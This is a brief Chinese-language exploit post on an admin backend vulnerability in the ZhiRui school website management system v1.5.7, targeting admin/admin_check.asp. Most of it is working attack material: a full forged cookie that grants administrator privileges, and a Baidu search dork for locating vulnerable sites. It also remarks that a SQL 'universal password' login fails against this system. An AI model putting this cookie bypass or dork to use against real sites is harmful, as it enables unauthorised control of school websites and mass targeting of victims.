智睿学校网站管理系统VER1.5.7后台漏洞

漏洞页面：admin/admin_check.asp

cookie:
rtime=1; ltime=1268355028173; cnzz_eid=62880375-1268290090-; cnzz_a1746221=4; sin1746221=none; ASPSESSIONIDASCSQRQT=GCDLGCMAFJLHLFPOIKOPKNNF; ZhiRui=Check=ZhiRuiSystem&AdminPurview=%7C111%2C%7C112%2C%7C113%2C%7C114%2C%7C115%2C%7C116%2C%7C117%2C%7C118%2C%7C119%2C%7C121%2C%7C122%2C%7C123%2C%7C211%2C%7C212%2C%7C213%2C%7C214%2C%7C311%2C%7C312%2C%7C313%2C%7C314%2C%7C1011%2C%7C1012%2C%7C1013%2C%7C1014%2C%7C511%2C%7C512%2C%7C513%2C%7C514%2C%7C611%2C%7C612%2C%7C711%2C%7C712%2C%7C713%2C%7C714%2C%7C411%2C%7C412%2C%7C413%2C%7C414%2C%7C415%2C%7C811%2C%7C812%2C%7C813%2C%7C814%2C%7C815%2C%7C911%2C&ZhiRuiUser=%B9%DC%C0%ED%D4%B1&ZhiRuiAdmin=newborn

 

关键字：

http://www.baidu.com/s?tn=baiduadv&rn=100&bs=inurl%3A+%28Book_list.asp%29&f=8&wd=inurl%3A+%28Book_list.asp%29++%D7%C9%D1%AF%D6%D0%D0%C4

 

 后台登陆本来可以用新一代万能密码登陆的

可是他验证了获取的用户名和输入的用户名，所以成了鸡肋